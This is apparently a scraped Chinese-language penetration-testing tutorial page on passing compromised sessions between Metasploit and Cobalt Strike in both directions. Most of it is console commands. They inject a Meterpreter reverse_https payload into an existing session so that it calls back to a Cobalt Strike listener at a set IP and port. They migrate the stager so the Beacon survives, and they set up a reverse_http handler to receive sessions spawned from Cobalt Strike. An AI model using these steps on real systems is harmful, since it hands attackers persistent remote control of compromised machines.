会话传递

MSF TO CS

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
#首先,backgroud 会话
background

#调用 payload_inject 模块
use exploit/windows/local/payload_inject

#设置 HTTPS Payload
set payload windows/meterpreter/reverse_https

#设置 lhost 和 lport 为 Cobalt Strike 的监听 IP 与端口
set lhost 192.168.175.200
set lport 443

#设置 DisablePayloadHandler 为 True,
#此选项会让 Metasploit Framework 避免在其内起一个 handler 来服务你的 payload 连接,
#也就是告诉 Metasploit Framework 说我们已经建立了监听器,不必再新建监听器了。
set DisablePayloadHandler True

#可选)设置 PrependMigrate 为 True,
#此选项让 Metasploit Framework 前置 shellcode 在另一个进程中运行 payload stager,
#如果被利用的应用程序崩溃或被用户关闭,这会帮助 Beacon 会话存活。
set PrependMigrate True

#设置要传递的会话 session,如果不知道自己的 session id,可以通过 sessions -l 查看
set session 4

#开始会话传递
run

CS TO MSF

1
2
#在 Cobalt Strike 上先创建一个  Foreign HTTP 监听,
#IP 和 端口设置成上面 Metasploit Framework 所设置 handler 模块的端口和 IP

​​image​​

1
#之后在 Cobalt Strike 上右击待传递的会话选择 Spawn ,选择刚刚创建的 Foreign HTTP 监听

image

1
2
3
4
5
6
7
8
9
10
11
12
13
MSF:
#首先,在 Metasploit Framework 上调用 handler 模块
use exploit/multi/handler

#设置 HTTP Payload
set payload windows/meterpreter/reverse_http
set lhost 192.168.175.200
set lport 4480

#运行该模块
run

#已经开启监听,过一会CS的会话就传递过来了